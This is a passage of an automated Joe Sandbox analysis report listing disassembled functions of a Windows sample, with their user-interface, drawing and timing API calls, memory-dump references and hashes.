                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1976402638-0
                                                                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                        Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 642888154-0
                                                                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                        Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                        • API String ID: 2487901850-572801152
                                                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                        Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871949834-0
                                                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                        Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                        Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                        • String ID:
                                                                                                        • API String ID: 3611059338-0
                                                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                        Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                        • String ID:
                                                                                                        • API String ID: 1640429340-0
                                                                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                        Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • _wcslen.LIBCMT ref: 004438CD
                                                                                                        • _wcslen.LIBCMT ref: 004438E6
                                                                                                        • _wcstok.LIBCMT ref: 004438F8
                                                                                                        • _wcslen.LIBCMT ref: 0044390C
                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                        • _wcstok.LIBCMT ref: 00443931
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3632110297-0
                                                                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                        Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 752480666-0
                                                                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                        Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3275902921-0
                                                                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                        Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3275902921-0
                                                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                        Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                        • String ID:
                                                                                                        • API String ID: 2833360925-0
                                                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                        Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3691411573-0
                                                                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                        Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                        • String ID:
                                                                                                        • API String ID: 372113273-0
